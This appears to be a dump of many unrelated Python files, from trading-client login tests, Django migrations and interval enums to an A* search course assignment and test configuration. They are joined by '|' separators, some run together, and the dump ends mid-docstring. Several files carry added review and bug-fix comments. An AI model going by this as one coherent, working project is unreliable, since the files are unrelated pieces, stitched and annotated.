    """Interactive login/logout smoke tests for the webull client.

    NOTE(review): login_prompt() appears to prompt for credentials and
    these tests talk to the live service -- they are intended for manual
    runs (`python -m pytest -s`), not for CI.
    """
    def test_login(self):
        # login_prompt() is expected to return True on successful login.
        webull_obj = webull.webull()
        assert True == webull_obj.login_prompt()
    def test_logout(self):
        # Logging out requires a prior (interactive) login.
        webull_obj = webull.webull()
        print("Login success: {}".format(webull_obj.login_prompt()))
        assert True == webull_obj.logout()
|
# NOTE(review): competitive-programming style solution reading stdin.
# First line: n. The closed form n*(n+1)*(n+2)//6 equals the sum of
# k*(n-k+1) over k = 1..n. Each of the next n-1 lines holds a pair of
# integers (presumably a tree edge over vertices 1..n -- unverifiable
# from this file alone); min(u)*(n-max(u)+1) is subtracted per line.
n = int(input())
answer = n*(n+1)*(n+2)//6
for i in range(n-1):
    u = list(map(int,input().split()))
    answer -= min(u)*(n-max(u)+1)
print(answer)
class Solution:
    def subtractProductAndSum(self, n: int) -> int:
        """Return (product of the decimal digits of n) minus (their sum)."""
        digit_sum = 0
        digit_product = 1
        while n:
            n, digit = divmod(n, 10)
            digit_sum += digit
            digit_product *= digit
        return digit_product - digit_sum
|
"""
Tool to replace underscore by spaces
"""
import argparse
import os
__version__ = '0.0.1'
def parse_args():
    """Parse command-line arguments.

    Accepts one or more filename tokens plus two mutually exclusive flags:
    -s/--space (underscores -> spaces) and -r/--recursive
    (spaces -> underscores for each listed file).
    """
    parser = argparse.ArgumentParser(description="Rename file")
    # -s and -r cannot be combined.
    group = parser.add_mutually_exclusive_group()
    # nargs='+': a filename containing spaces may arrive as several tokens.
    parser.add_argument("file", help="taking filename", type=str, nargs='+')
    group.add_argument("-s", "--space", action="store_true")
    group.add_argument("-r", "--recursive", action="store_true")
    return parser.parse_args()
def main():
    """Rename files according to the parsed flags.

    Default: join all given tokens with underscores and rename the
    space-joined original to it. With -s: replace underscores by spaces in
    the (single) given filename. With -r: underscore-ify each listed file.
    """
    args = parse_args()
    new_filename = '_'.join(args.file)
    filename = ' '.join(args.file)
    if args.space:
        new_filename = args.file[0].replace('_', ' ')
        # Bug fix: the new name was previously computed here but the file
        # was never renamed, so -s (the tool's headline feature per the
        # module docstring) had no effect.
        os.rename(args.file[0], new_filename)
    elif args.recursive:
        for file in args.file:
            os.rename(file, file.replace(' ', '_'))
    else:
        os.rename(filename, new_filename)
# Script entry point.
if __name__ == "__main__":
    main()
|
"""This file is Only for debugging while running docker in dev mode. docker will not run this file if in production mode."""
import logging
from app.mainController import app
import ptvsd
logger = logging.getLogger('app.' + __name__)  # make logger part of the 'app' module. (that is how to distinguish app logs with vendor module logs)
# start debugging
# Announce loudly that this dev-only debug entry point is in use.
logger.critical('CRITICAL: RUNNING IN DEBUG MODE')
try:
    # Listen for a remote debugger attach (ptvsd / VS Code) on port 8081.
    ptvsd.enable_attach(address=('0.0.0.0', 8081))
except Exception as e:
    # NOTE(review): failure reason is not inspected -- presumably this
    # fires when the port is taken or the reloader re-imports the module.
    logger.warning('DEBUGGING IS DISABLED. (make sure flask is running without debug mode (environment variable FLASK_DEBUG: 0)')
if __name__ == "__main__":
    # below line set debug=False to enable debugging (I know its counterintuitive) but that will disable auto-reloading
    # set debug=True to disable debugging but enable auto-reloading app
    app.run(host="0.0.0.0", debug=True, port=8080)
|
import logging
import os
import random
import time
import click
import numpy as np
import seaborn as sns
from collate import COLLATION_PATH, HERE, SUMMARY_DIRECTORY, collate, read_collation
from pykeen_report import plot as pkp
logger = logging.getLogger(__name__)
def make_plots(
    *,
    target_header: str,
    make_png: bool = True,
    make_pdf: bool = True,
):
    """Collate all HPO results in a single table.

    Reads the collation dataframe and writes 1D-slice, per-dataset README
    index, dataset/optimizer/model, stratified, 2D and size-plot summaries
    under SUMMARY_DIRECTORY.

    :param target_header: Name of the metric column to plot.
    :param make_png: Whether to emit .png files for each figure.
    :param make_pdf: Whether to emit .pdf files for each figure.
    """
    df = read_collation()
    # Drop bookkeeping columns that would otherwise show up as facets.
    for k in ['searcher', 'evaluator']:
        if k in df.columns:
            del df[k]
    sns.set_style("whitegrid")
    summary_1d_directory = os.path.join(SUMMARY_DIRECTORY, '1D-slices')
    os.makedirs(summary_1d_directory, exist_ok=True)
    pkp.write_1d_sliced_summaries(
        df=df, target_header=target_header, output_directory=summary_1d_directory,
        make_pdf=make_pdf, make_png=make_png,
    )
    # Regenerate the README index with one 1D-slice image per dataset.
    with open(os.path.join(HERE, 'README.md'), 'w') as file:
        print(f'# Ablation Results\n', file=file)
        print(f'Output at {time.asctime()}\n', file=file)
        for v in sorted(df['dataset'].unique()):
            print(f'<img src="summary/1D-slices/dataset_{v}.png" alt="{v}"/>\n', file=file)
    sns.set_style("darkgrid")
    dataset_optimizer_directory = os.path.join(SUMMARY_DIRECTORY, 'dataset_optimizer_model_summary')
    os.makedirs(dataset_optimizer_directory, exist_ok=True)
    pkp.write_dataset_optimizer_model_summaries(
        df=df, target_header=target_header, output_directory=dataset_optimizer_directory,
        make_pdf=make_pdf, make_png=make_png,
    )
    pkp.write_1d_sliced_summaries_stratified(
        df=df, target_header=target_header, output_directory=SUMMARY_DIRECTORY,
        make_pdf=make_pdf, make_png=make_png,
    )
    pkp.write_2d_summaries(
        df=df, target_header=target_header, output_directory=SUMMARY_DIRECTORY,
        make_pdf=make_pdf, make_png=make_png,
    )
    # Trellised model-size vs. metric plots.
    sizeplot_dir = os.path.join(SUMMARY_DIRECTORY, 'sizeplots')
    os.makedirs(sizeplot_dir, exist_ok=True)
    pkp.make_sizeplots_trellised(
        df=df,
        target_x_header='model_bytes',
        target_y_header=target_header,
        output_directory=sizeplot_dir,
        make_pdf=make_pdf, make_png=make_png,
    )
# CLI entry point: collate results if the cached collation is missing,
# then regenerate all summary plots for the hits@10 metric.
# (Deliberately no docstring added: click would surface it as help text.)
@click.command()
def main():
    key = 'hits@10'
    if not os.path.exists(COLLATION_PATH):
        collate(key)
    # Plotting should be deterministic
    np.random.seed(5)
    random.seed(5)
    make_plots(target_header=key)
    click.echo('done!')
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    main()
|
# uncompyle6 version 3.4.1
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (v2.7.16:413a49145e, Mar 2 2019, 14:32:10)
# [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]
# Embedded file name: /Users/versonator/Jenkins/live/output/mac_64_static/Release/python-bundle/MIDI Remote Scripts/_Framework/NotifyingControlElement.py
# Compiled at: 2019-04-09 19:23:45
from __future__ import absolute_import, print_function, unicode_literals
from .SubjectSlot import Subject, SubjectEvent
from .ControlElement import ControlElement
class NotifyingControlElement(Subject, ControlElement):
    u"""
    Class representing control elements that can send values
    """
    # SubjectSlot machinery: declares a 'value' event that observers can
    # connect to; per its doc string it fires when the element receives a
    # MIDI value from the hardware.
    __subject_events__ = (
        SubjectEvent(name='value', doc=' Called when the control element receives a MIDI value\n from the hardware '),)
from enum import Enum
# String command names; they mirror the Mode enum members defined in this
# file, plus 'async' which has no Mode counterpart.
RUN = 'run'
LISTEN = 'listen'
READ = 'read'
CLEAR = 'clear'
ASYNC = 'async'
class Mode(Enum):
    # Power-of-two values, so modes could be combined as bit flags.
    # NOTE(review): enum.Flag would make that combination explicit.
    RUN = 1
    LISTEN = 2
    READ = 4
    CLEAR = 8
class Options:
    """Mutable runtime option flags, defaulting to Mode.RUN and all
    boolean options off."""

    def __init__(self):
        self.mode = Mode.RUN
        # Bug fix: this was `self.async = False`, which is a SyntaxError on
        # Python 3.7+ where `async` became a reserved keyword. Renamed to
        # the conventional trailing-underscore form.
        self.async_ = False
        self.save = False
        self.print = False

    def __str__(self):
        return str(self.__class__) + ": " + str(self.__dict__)
|
# Generated by Django 3.2.6 on 2021-11-30 01:51
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Makes work_order start/end times optional with a "now" default.
    dependencies = [
        ('report_system', '0002_work_order'),
    ]
    operations = [
        # NOTE(review): default=datetime.datetime.now passes the callable,
        # so it is evaluated per-save (correct) -- not at migration time.
        migrations.AlterField(
            model_name='work_order',
            name='end_time',
            field=models.DateTimeField(blank=True, default=datetime.datetime.now, help_text='結束時間', null=True, verbose_name='結束時間'),
        ),
        migrations.AlterField(
            model_name='work_order',
            name='start_time',
            field=models.DateTimeField(blank=True, default=datetime.datetime.now, help_text='開始時間', null=True, verbose_name='開始時間'),
        ),
    ]
|
from intervals import (
AbstractInterval, canonicalize, CharacterInterval,
DateInterval, DateTimeInterval, DecimalInterval,
FloatInterval, Interval, IntervalFactory,
IntInterval, NumberInterval, IllegalArgument,
IntervalException, RangeBoundsException
)
# Public re-export list; matches the names imported from `intervals` above.
__all__ = [
    'AbstractInterval', 'CharacterInterval', 'canonicalize',
    'DateInterval', 'DateTimeInterval', 'DecimalInterval',
    'FloatInterval', 'Interval', 'IntervalException',
    'IntervalFactory', 'IntInterval', 'IllegalArgument',
    'NumberInterval', 'RangeBoundsException'
]
from flex.datastructures.enum import IntEnum
from flex.utils.decorators import export
class IntervalFlags(IntEnum):
    """Bit flags describing interval boundary kinds.

    NOTE(review): several members reuse earlier values (LEFT_CLOSED == 1 ==
    LEFT_OPEN, RIGHT_CLOSED == RIGHT_OPEN, CLOSED == OPEN). Under enum
    semantics a member with a duplicate value is an *alias*, so
    IntervalFlags.LEFT_CLOSED *is* IntervalFlags.LEFT_OPEN. The
    commented-out definitions suggest the closed/bound encoding was still
    being worked out -- confirm intent before relying on these names being
    distinct.
    """
    LEFT_OPEN = 1 << 0 # 0001 == 1
    RIGHT_OPEN = 1 << 1 # 0010 == 2
    OPEN = LEFT_OPEN | RIGHT_OPEN # 0011 == 3
    LEFT_UNBOUND = LEFT_OPEN | 1 << 2 # 0101 == 5
    RIGHT_UNBOUND = RIGHT_OPEN | 1 << 3 # 1010 == 10
    UNBOUND = LEFT_UNBOUND | RIGHT_UNBOUND # 1111 == 15 (comment fixed; 5 | 10 is 15, not 12)
    # LEFT_CLOSED = ~LEFT_OPEN & ~LEFT_UNBOUND #
    # RIGHT_CLOSED = ~RIGHT_OPEN & ~RIGHT_UNBOUND #
    # CLOSED = ~OPEN & ~UNBOUND #
    LEFT_CLOSED = 1 << 0 # 0001 = 1 (alias of LEFT_OPEN -- see class note)
    RIGHT_CLOSED = 1 << 1 # 0010 = 2 (alias of RIGHT_OPEN)
    CLOSED = LEFT_CLOSED | RIGHT_CLOSED # 0011 = 3 (alias of OPEN)
    LEFT_BOUND = 1 << 2 # 0100 == 4
    RIGHT_BOUND = 1 << 3 # 1000 == 8
    BOUND = LEFT_BOUND | RIGHT_BOUND # 1100 == 12
    FIXED = 1 << 4
# def test_flags():
# testTrue(LEFT_UNBOUND, LEFT_OPEN, '&', LEFT_UNBOUND & LEFT_OPEN)
# testTrue(RIGHT_UNBOUND, RIGHT_OPEN, '&', RIGHT_UNBOUND & RIGHT_OPEN)
# testTrue(UNBOUND, OPEN, '&', UNBOUND & OPEN)
# echo(f='hr').br()
# testFalse(
# (LEFT_CLOSED | LEFT_UNBOUND),
# LEFT_UNBOUND, '&',
# (LEFT_CLOSED | LEFT_UNBOUND) & LEFT_UNBOUND,
# '(%s | %s)' % (LEFT_CLOSED, LEFT_UNBOUND)
# )
# testFalse(LEFT_CLOSED, LEFT_UNBOUND, '&', LEFT_CLOSED & LEFT_UNBOUND)
# testFalse(RIGHT_CLOSED, RIGHT_UNBOUND, '&', RIGHT_CLOSED & RIGHT_UNBOUND)
# testFalse(CLOSED, UNBOUND, '&', CLOSED & UNBOUND)
# echo(f='hr').br()
# testFalse(LEFT_CLOSED, LEFT_UNBOUND, '&', LEFT_CLOSED & LEFT_UNBOUND)
# def testTrue(v1, v2, op, res, exp1=None, exp2=None, reverse=False):
# exp1 = exp1 or v1
# exp2 = exp2 or v2
# # passed = not res if reverse else res
# color = '' if (not res if reverse else res) else 'red,bold'
# title = ('%s %s %s' % (exp1, op, exp2)).replace('IntervalFlags.', '')
# title = re.sub(r'([A-Z][\w]+\.)([A-Z][A-Z0-9_]+)', r'\2', '%s %s %s' % (exp1, op, exp2))
# pl, ll, lt = -24, 18, max(len(title)+4, 44)
# echo('', title, ' ', f=color).br()\
# ('-'*lt, f=color).br()\
# (pad('%d' % v1, pl))('=')(bits(v1), f='bold').br()\
# (pad('%d' % v2, pl))('=')(bits(v2), f='bold').br()\
# (' '*(-pl-4), '-'*ll, f=color).br()\
# (pad('%d %s %d' % (v1, op, v2), pl))('=')\
# (bits(res), f='bold,yellow')('=')\
# ('%d' % res).br().br()\
# # (' ', '='*ll, f=color).br().br()
# def testFalse(v1, v2, op, res, exp1=None, exp2=None):
# return testTrue(v1, v2, op, res, exp1, exp2, reverse=True)
# def _flags_2_global():
# g = globals()
# for f in IntervalFlags:
# g[f.name] = f
# _flags_2_global()
# del _flags_2_global
# import re
# from flex.helpers import uzi
# from flex.helpers.uzi import pad
# from flex.utils.echo import echo
# def bits(v, s=8, p=None, glen=4, gsep='-'):
# p, v = p or s, int(v)
# while abs(v) > 2**p:
# p *= 2
# regex = re.compile(r'([01%(gsep)s]{%(glen)d,})([01]{%(glen)d})' % dict(gsep=re.escape(gsep), glen=glen))
# return regex.sub(r'\1%s\2' % gsep, ('{0:0%sb}' % p).format(v))
# echo('Intervals', f='hr,bold,green').br().br()
# test_flags()
# echo.br()(f='hr,green,bold').br()
|
# The quote character this module splits on.
QUOTE = "'"


def split_quoted(s):
    """Split a string with quotes, some possibly escaped, into a list of
    alternating quoted and unquoted segments. Raises a ValueError if there are
    unmatched quotes.

    Both the first and last entry are unquoted, but might be empty, and
    therefore the length of the resulting list must be an odd number.
    """
    segments = []
    for piece in s.split(QUOTE):
        if segments and segments[-1].endswith('\\'):
            # The preceding quote was escaped: glue this piece back onto
            # the previous segment, restoring the quote character.
            segments[-1] += QUOTE + piece
        else:
            segments.append(piece)
    if len(segments) % 2 == 0:
        raise ValueError('Unmatched quote.')
    return segments
def process_unquoted(s, sub):
    """Splits a string into unquoted and quoted segments, applies a substitution
    function to the unquoted segments only, and joins it back together again.
    """
    pieces = []
    for index, segment in enumerate(split_quoted(s)):
        if index % 2 == 0:
            # Even positions are unquoted text: apply the substitution.
            pieces.append(sub(segment))
        else:
            # Odd positions were quoted: re-wrap them untouched.
            pieces.append(QUOTE + segment + QUOTE)
    return ''.join(pieces)
|
# coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
from eva.catalog.models.df_column import DataFrameColumn
from eva.catalog.services.base_service import BaseService
class DatasetColumnService(BaseService):
    """Catalog service exposing lookups over DataFrameColumn rows."""
    def __init__(self):
        # BaseService binds self.model to the DataFrameColumn model class.
        super().__init__(DataFrameColumn)
    def columns_by_dataset_id_and_names(self, dataset_id, column_names):
        """Return the ids of the columns of dataset `dataset_id` whose
        names appear in `column_names`.

        NOTE(review): result order follows the query, which is not
        guaranteed to match the order of `column_names`.
        """
        result = self.model.query \
            .with_entities(self.model._id) \
            .filter(self.model._metadata_id == dataset_id,
                    self.model._name.in_(column_names)) \
            .all()
        # Each row is a 1-tuple (id,); unwrap to a plain list of ids.
        return [res[0] for res in result]
    def columns_by_id_and_dataset_id(self,
                                     dataset_id: int,
                                     id_list: List[int] = None):
        """return all the columns that matches id_list and dataset_id
        Arguments:
            dataset_id {int} -- [metadata id of the table]
            id_list {List[int]} -- [metadata ids of the required columns: If
            None return all the columns that matches the dataset_id]
        Returns:
            List[self.model] -- [the filtered self.models]
        """
        if id_list is not None:
            return self.model.query \
                .filter(self.model._metadata_id == dataset_id,
                        self.model._id.in_(id_list)) \
                .all()
        # id_list is None: return every column of the dataset.
        return self.model.query \
            .filter(self.model._metadata_id == dataset_id) \
            .all()
    def create_column(self, column_list):
        """Persist every column in `column_list`; returns the saved rows."""
        saved_column_list = []
        for column in column_list:
            saved_column_list.append(column.save())
        return saved_column_list
|
from framework import *
from problems import *
from matplotlib import pyplot as plt
import numpy as np
from typing import List, Union, Optional
# Load the streets map (module-level side effect: reads the CSV on import).
streets_map = StreetsMap.load_from_csv(Consts.get_data_file_path("tlv_streets_map.csv"))
# Make sure that the whole execution is deterministic.
# This is important, because we expect to get the exact same results
# in each execution.
Consts.set_seed()
def plot_distance_and_expanded_wrt_weight_figure(
        problem_name: str,
        weights: Union[np.ndarray, List[float]],
        total_cost: Union[np.ndarray, List[float]],
        total_nr_expanded: Union[np.ndarray, List[int]]):
    """
    Use `matplotlib` to generate a figure of the distance & #expanded-nodes
    w.r.t. the weight.

    [Ex.15] Implemented: the two curves are drawn exactly as the former
    TODOs specified (blue solid 'Solution cost' on the left axis, red
    solid '#Expanded states' on a twinned right axis), and the
    NotImplementedError placeholders are removed.
    """
    weights, total_cost, total_nr_expanded = np.array(weights), np.array(total_cost), np.array(total_nr_expanded)
    assert len(weights) == len(total_cost) == len(total_nr_expanded)
    assert len(weights) > 0
    is_sorted = lambda a: np.all(a[:-1] <= a[1:])
    assert is_sorted(weights)

    fig, ax1 = plt.subplots()

    # Solution cost vs. weight: blue solid curve on the left y-axis.
    p1, = ax1.plot(weights, total_cost, color='b', linestyle='-', label='Solution cost')

    # ax1: Make the y-axis label, ticks and tick labels match the line color.
    ax1.set_ylabel('Solution cost', color='b')
    ax1.tick_params('y', colors='b')
    ax1.set_xlabel('weight')

    # Create another axis for the #expanded curve.
    ax2 = ax1.twinx()

    # #Expanded states vs. weight: red solid curve on the right y-axis.
    p2, = ax2.plot(weights, total_nr_expanded, color='r', linestyle='-', label='#Expanded states')

    # ax2: Make the y-axis label, ticks and tick labels match the line color.
    ax2.set_ylabel('#Expanded states', color='r')
    ax2.tick_params('y', colors='r')

    curves = [p1, p2]
    ax1.legend(curves, [curve.get_label() for curve in curves])

    fig.tight_layout()
    plt.title(f'Quality vs. time for wA* \non problem {problem_name}')
    plt.show()
def run_astar_for_weights_in_range(heuristic_type: HeuristicFunctionType, problem: GraphProblem, n: int = 30,
                                   max_nr_states_to_expand: Optional[int] = 40_000,
                                   low_heuristic_weight: float = 0.5, high_heuristic_weight: float = 0.95):
    """
    [Ex.15] Run wA* over `n` weights equally spread in
    [low_heuristic_weight, high_heuristic_weight] (edges included), collect
    the cost / #expanded of every run that found a solution, and plot them.
    """
    weights = np.linspace(low_heuristic_weight, high_heuristic_weight, n)
    used_weights, costs, nr_expanded = [], [], []
    for weight in weights:
        # NOTE(review): keyword names `heuristic_weight` / `max_nr_states_to_expand`
        # assumed from the assignment's AStar c'tor — TODO confirm against framework.
        solver = AStar(heuristic_type, heuristic_weight=weight,
                       max_nr_states_to_expand=max_nr_states_to_expand)
        res = solver.solve_problem(problem)
        if res.is_solution_found:
            used_weights.append(weight)
            costs.append(res.solution_g_cost)
            nr_expanded.append(res.nr_expanded_states)
    # The three lists are index-aligned by construction.
    plot_distance_and_expanded_wrt_weight_figure(problem.name, used_weights, costs, nr_expanded)
# --------------------------------------------------------------------
# ------------------------ StreetsMap Problem ------------------------
# --------------------------------------------------------------------
def toy_map_problem_experiments():
    """Exercises 10/12/13/15 on the toy streets-map problem.

    Ex.10 runs UniformCost; the remaining steps are intentionally left as
    student TODO scaffolding, with `exit()` placeholders that stop execution
    until implemented.
    """
    print()
    print('Solve the map problem.')
    # Ex.10
    # TODO: Just run it and inspect the printed result.
    # 54 / 549 are presumably source/target junction ids in `streets_map` — TODO confirm.
    toy_map_problem = MapProblem(streets_map, 54, 549)
    uc = UniformCost()
    res = uc.solve_problem(toy_map_problem)
    print(res)
    # Ex.12
    # TODO: create an instance of `AStar` with the `NullHeuristic`,
    # solve the same `toy_map_problem` with it and print the results (as before).
    # Notice: AStar constructor receives the heuristic *type* (ex: `MyHeuristicClass`),
    # and NOT an instance of the heuristic (eg: not `MyHeuristicClass()`).
    exit()  # TODO: remove!
    # Ex.13
    # TODO: create an instance of `AStar` with the `AirDistHeuristic`,
    # solve the same `toy_map_problem` with it and print the results (as before).
    exit()  # TODO: remove!
    # Ex.15
    # TODO:
    # 1. Complete the implementation of the function
    #    `run_astar_for_weights_in_range()` (upper in this file).
    # 2. Complete the implementation of the function
    #    `plot_distance_and_expanded_wrt_weight_figure()`
    #    (upper in this file).
    # 3. Call here the function `run_astar_for_weights_in_range()`
    #    with `AirDistHeuristic` and `toy_map_problem`.
    exit()  # TODO: remove!
# --------------------------------------------------------------------
# ---------------------------- MDA Problem ---------------------------
# --------------------------------------------------------------------
# Caches: each problem input file is parsed at most once, and each
# (input size, optimization objective) pair maps to a single MDAProblem.
loaded_problem_inputs_by_size = {}
loaded_problems_by_size_and_opt_obj = {}
def get_mda_problem(
        problem_input_size: str = 'small',
        optimization_objective: MDAOptimizationObjective = MDAOptimizationObjective.Distance):
    """Return the MDAProblem for the given input size and objective.

    Problem inputs and constructed problems are memoized in the module-level
    caches, so repeated calls with the same arguments return the same object.
    """
    cache_key = (problem_input_size, optimization_objective)
    cached_problem = loaded_problems_by_size_and_opt_obj.get(cache_key)
    if cached_problem is not None:
        return cached_problem
    assert problem_input_size in {'small', 'moderate', 'big'}
    if problem_input_size not in loaded_problem_inputs_by_size:
        loaded_problem_inputs_by_size[problem_input_size] = MDAProblemInput.load_from_file(
            f'{problem_input_size}_mda.in', streets_map)
    problem = MDAProblem(
        problem_input=loaded_problem_inputs_by_size[problem_input_size],
        streets_map=streets_map,
        optimization_objective=optimization_objective)
    loaded_problems_by_size_and_opt_obj[cache_key] = problem
    return problem
def basic_mda_problem_experiments():
    """Ex.18: solve the small MDA problem (distance objective) with UniformCost.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (small input, only distance objective, UniformCost).')
    small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
    # Ex.18
    # TODO: create an instance of `UniformCost`, solve the `small_mda_problem_with_distance_cost`
    # with it and print the results.
    exit()  # TODO: remove!
def mda_problem_with_astar_experiments():
    """Ex.22/25/28: A* with the three air-distance heuristics on moderate MDA.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (moderate input, only distance objective, A*, '
          'MaxAirDist & SumAirDist & MSTAirDist heuristics).')
    moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
    # Ex.22
    # TODO: create an instance of `AStar` with the `MDAMaxAirDistHeuristic`,
    # solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
    exit()  # TODO: remove!
    # Ex.25
    # TODO: create an instance of `AStar` with the `MDASumAirDistHeuristic`,
    # solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
    exit()  # TODO: remove!
    # Ex.28
    # TODO: create an instance of `AStar` with the `MDAMSTAirDistHeuristic`,
    # solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
    exit()  # TODO: remove!
def mda_problem_with_weighted_astar_experiments():
    """Ex.30: weighted-A* weight sweeps over the small & moderate MDA problems.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (small & moderate input, only distance objective, wA*).')
    small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
    moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
    # Ex.30
    # TODO: Call here the function `run_astar_for_weights_in_range()`
    # with `MDAMSTAirDistHeuristic`
    # over the `small_mda_problem_with_distance_cost`.
    exit()  # TODO: remove!
    # Ex.30
    # TODO: Call here the function `run_astar_for_weights_in_range()`
    # with `MDASumAirDistHeuristic`
    # over the `moderate_mda_problem_with_distance_cost`.
    exit()  # TODO: remove!
def monetary_cost_objectives_mda_problem_experiments():
    """Ex.32: UniformCost over the MDA problem with the monetary objective.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (monetary objectives).')
    small_mda_problem_with_monetary_cost = get_mda_problem('small', MDAOptimizationObjective.Monetary)
    moderate_mda_problem_with_monetary_cost = get_mda_problem('moderate', MDAOptimizationObjective.Monetary)
    # Ex.32
    # TODO: create an instance of `UniformCost`
    # solve the `small_mda_problem_with_monetary_cost` with it and print the results.
    exit()  # TODO: remove!
    # Ex.32
    # TODO: create an instance of `UniformCost`
    # solve the `moderate_mda_problem_with_monetary_cost` with it and print the results.
    exit()  # TODO: remove!
def multiple_objectives_mda_problem_experiments():
    """Ex.35/38: distance vs. tests-travel-distance objectives, incl. the A_2 scheme.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (moderate input, distance & tests-travel-distance objectives).')
    moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
    moderate_mda_problem_with_tests_travel_dist_cost = get_mda_problem('moderate', MDAOptimizationObjective.TestsTravelDistance)
    # Ex.35
    # TODO: create an instance of `AStar` with the `MDATestsTravelDistToNearestLabHeuristic`,
    # solve the `moderate_mda_problem_with_tests_travel_dist_cost` with it and print the results.
    exit()  # TODO: remove!
    # Ex.38
    # TODO: Implement the algorithm A_2 described in this exercise in the assignment instructions.
    # Create an instance of `AStar` with the `MDAMSTAirDistHeuristic`.
    # Solve the `moderate_mda_problem_with_distance_cost` with it and store the solution's (optimal)
    # distance cost to the variable `optimal_distance_cost`.
    # Calculate the value (1 + eps) * optimal_distance_cost in the variable `max_distance_cost` (for eps=0.6).
    # Create another instance of `AStar` with the `MDATestsTravelDistToNearestLabHeuristic`, and specify the
    # param `open_criterion` (to AStar c'tor) to be the criterion mentioned in the A_2 algorithm in the
    # assignment instructions. Use a lambda function for that. This function should receive a `node` and
    # has to return whether to add this just-created-node to the `open` queue.
    # Remember that in python you can pass an argument to a function's parameter by the parameter's name
    # `some_func(argument_name=some_value)`. This becomes especially relevant when you want to leave some
    # previous parameters with their default values and pass an argument to a parameter that is positioned
    # elsewhere next.
    # Solve the `moderate_mda_problem_with_tests_travel_dist_cost` with it and print the results.
    exit()  # TODO: remove!
def mda_problem_with_astar_epsilon_experiments():
    """Ex.43: A*-epsilon with a non-admissible focal heuristic on the small MDA problem.

    The reference A* run is executed; the A*eps step itself is intentionally
    left as student TODO scaffolding (`exit()` stops execution).
    """
    print()
    print('Solve the MDA problem (small input, distance objective, using A*eps, use non-acceptable '
          'heuristic as focal heuristic).')
    small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
    # Firstly solve the problem with AStar & MST heuristic for having a reference for #devs.
    astar = AStar(MDAMSTAirDistHeuristic)
    res = astar.solve_problem(small_mda_problem_with_distance_cost)
    print(res)

    def within_focal_h_sum_priority_function(node: SearchNode, problem: GraphProblem, solver: AStarEpsilon):
        # Lazily cache one MDASumAirDistHeuristic instance on the solver so
        # it is built only once per solve.
        if not hasattr(solver, '__focal_heuristic'):
            setattr(solver, '__focal_heuristic', MDASumAirDistHeuristic(problem=problem))
        focal_heuristic = getattr(solver, '__focal_heuristic')
        return focal_heuristic.estimate(node.state)

    # Ex.43
    # Try using A*eps to improve the speed (#dev) with a non-acceptable heuristic.
    # TODO: Create an instance of `AStarEpsilon` with the `MDAMSTAirDistHeuristic`.
    # Solve the `small_mda_problem_with_distance_cost` with it and print the results.
    # Use focal_epsilon=0.23, and max_focal_size=40.
    # Use within_focal_priority_function=within_focal_h_sum_priority_function. This function
    # (defined just above) is internally using the `MDASumAirDistHeuristic`.
    exit()  # TODO: remove!
def mda_problem_anytime_astar_experiments():
    """Ex.46: Anytime-A* with the MST air-distance heuristic on moderate MDA.

    Intentionally left as student TODO scaffolding; `exit()` stops execution.
    """
    print()
    print('Solve the MDA problem (moderate input, only distance objective, Anytime-A*, '
          'MSTAirDist heuristics).')
    moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
    # Ex.46
    # TODO: create an instance of `AnytimeAStar` once with the `MDAMSTAirDistHeuristic`, with
    # `max_nr_states_to_expand_per_iteration` set to 1000, solve the
    # `moderate_mda_problem_with_distance_cost` with it and print the results.
    exit()  # TODO: remove!
def run_all_experiments():
    """Execute every experiment suite, in assignment order."""
    print('Running all experiments')
    experiment_suites = (
        toy_map_problem_experiments,
        basic_mda_problem_experiments,
        mda_problem_with_astar_experiments,
        mda_problem_with_weighted_astar_experiments,
        monetary_cost_objectives_mda_problem_experiments,
        multiple_objectives_mda_problem_experiments,
        mda_problem_with_astar_epsilon_experiments,
        mda_problem_anytime_astar_experiments,
    )
    for suite in experiment_suites:
        suite()
# Script entry point: run every experiment suite.
if __name__ == '__main__':
    run_all_experiments()
|
from pytest_allclose import report_rmses
from nengo.rc import rc
def pytest_runtest_setup(item):
    """Reset nengo's RC configuration to a known test state before each test."""
    # Drop any user/site RC files, then force the settings tests rely on.
    rc.reload_rc([])
    test_settings = (
        ("decoder_cache", "enabled", "False"),
        ("exceptions", "simplified", "False"),
        ("nengo.Simulator", "fail_fast", "True"),
        ("progress", "progress_bar", "False"),
    )
    for section, option, value in test_settings:
        rc[section][option] = value
def pytest_terminal_summary(terminalreporter):
    """Append RMSE statistics gathered by pytest-allclose to pytest's summary."""
    report_rmses(terminalreporter)
|
# Generated by Django 3.0.3 on 2020-04-12 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Extract clip dimensions into a standalone ``Resolution`` model.

    Auto-generated by Django 3.0.3: creates ``Resolution(width, height)`` and
    removes the ``height``/``width`` fields from ``clip``. Applied migrations
